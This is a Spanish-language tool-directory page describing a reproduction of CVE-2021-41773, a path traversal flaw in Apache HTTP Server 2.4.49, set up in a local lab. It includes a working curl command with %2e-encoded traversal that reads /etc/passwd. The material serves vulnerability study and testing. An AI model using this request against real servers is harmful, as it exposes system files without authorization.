Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-41773-POC — Reproducción de Vulnerabilidad de Path Traversal en Apache HTTP Server 2.4.49 | Kitploit
Herramientas/GitHubGitHub/fxdyx-a/cve-2021-41773-poc
ReconocimientoAnálisis de VulnerabilidadesExplotaciónSeguridad WebPruebas de Penetración
GitHubfxdyx-a/cve-2021-41773-poc

CVE-2021-41773-POC

Reproducción de Vulnerabilidad de Path Traversal en Apache HTTP Server 2.4.49

Ver Repositorio
1hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-41773 Informe de Reproducción de Vulnerabilidad

Resumen de la Vulnerabilidad

  • CVE ID: CVE-2021-41773
  • Nombre de la Vulnerabilidad: Vulnerabilidad de Path Traversal en Apache HTTP Server
  • Nivel de Riesgo: Alto (CVSS 7.5)
  • Versiones Afectadas: Apache HTTP Server 2.4.49
  • Descripción de la Vulnerabilidad: La versión 2.4.49 de Apache HTTP Server tiene un defecto en la implementación de la función de normalización de rutas ap_normalize_path. Un atacante puede eludir los controles de acceso mediante la construcción de solicitudes especiales que contienen codificación %2e, permitiendo leer cualquier archivo en el servidor web.

Configuración del Entorno

  • Sistema Operativo: Ubuntu 20.04 (máquina virtual)
  • Servidor Web: Apache httpd 2.4.49 (compilado e instalado manualmente)
  • Entorno de Práctica: Ejecutándose de forma independiente, escuchando en el puerto 8080
  • Configuración Clave:
    • Cambiar <Directory /> de Require all denied a Require all granted
    • Agregar Alias /vuln apuntando a /tmp/vuln_dir y establecer permisos

Reproducción de la Vulnerabilidad

Comando de Ataque

curl -v --path-as-is 'http://127.0.0.1:8080/vuln/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'

Capturas de Pantalla del Ataque

Lectura exitosa de /etc/passwd Lectura exitosa de /etc/passwd

Descargar herramienta